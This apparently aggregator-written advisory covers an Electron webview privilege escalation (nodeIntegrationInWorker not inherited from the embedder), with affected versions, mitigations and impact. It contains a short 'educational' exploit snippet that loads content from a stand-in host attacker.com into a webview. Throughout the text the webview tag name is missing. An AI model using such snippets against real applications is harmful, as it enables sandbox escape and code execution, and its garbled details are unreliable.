Electron, Privilege Escalation, CVE-2026-102676 (High) -DC-Sep2026-2613

Listen to this Post

Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML, and CSS. The vulnerability resides in the handling of the `` tag, specifically regarding the `nodeIntegrationInWorker` preference. In affected versions, a `` guest could enable `nodeIntegrationInWorker` for its Web Workers even when the embedder had explicitly disabled Node.js integration. This occurs because the `nodeIntegrationInWorker` option was omitted from the list of security preferences that a `` guest inherits from its embedder. As a result, the guest could set this preference independently via the `webpreferences` attribute, granting its dedicated workers a Node.js environment that the embedder itself did not grant. When the embedder is unsandboxed, this effectively drops the guest out of the sandbox, allowing untrusted content to execute Node.js code with elevated privileges. Applications are only affected if they enable the `` tag and the embedder is unsandboxed. Applications that do not use `` or that keep the embedder sandboxed are not affected. The fix ensures that `` and `window.open` now inherit `nodeIntegrationInWorker` from the embedder, consistent with other Node and sandbox preferences. This prevents a guest from being less secure than its embedder for this option.

DailyCVE Form:

Platform: Electron
Version: <41.10.6, 42.x
Vulnerability: Privilege Escalation
Severity: High
date: 2026-09-29

Prediction: 2026-09-29

What Undercode Say:

Check current Electron version
npm list electron
Example webPreferences with nodeIntegrationInWorker disabled
const webPreferences = {
nodeIntegration: false,
nodeIntegrationInWorker: false
};
// Malicious webview content in an unsandboxed embedder
const webview = document.createElement('webview');
webview.setAttribute('nodeintegrationinworker', 'true');
webview.src = 'https://attacker.com/exploit.html';
document.body.appendChild(webview);

Exploit: (Educational Purposes!)

// The guest page can set nodeIntegrationInWorker even if embedder disabled it
// This gives the worker access to Node.js APIs
const worker = new Worker('exploit.js');
worker.postMessage('start');

Protection: from this CVE

  • Upgrade to 41.10.6, 42.9.2, 43.4.1, or 44.0.0-beta.5.
  • Remove `nodeIntegrationInWorker` from guest preferences in a `will-attach-webview` handler.
  • Do not enable the `` tag when loading untrusted content.

Impact:

Untrusted guest content can create a Node-enabled worker with more privilege than the embedder granted. This leads to remote code execution, data exfiltration, and sandbox escape.
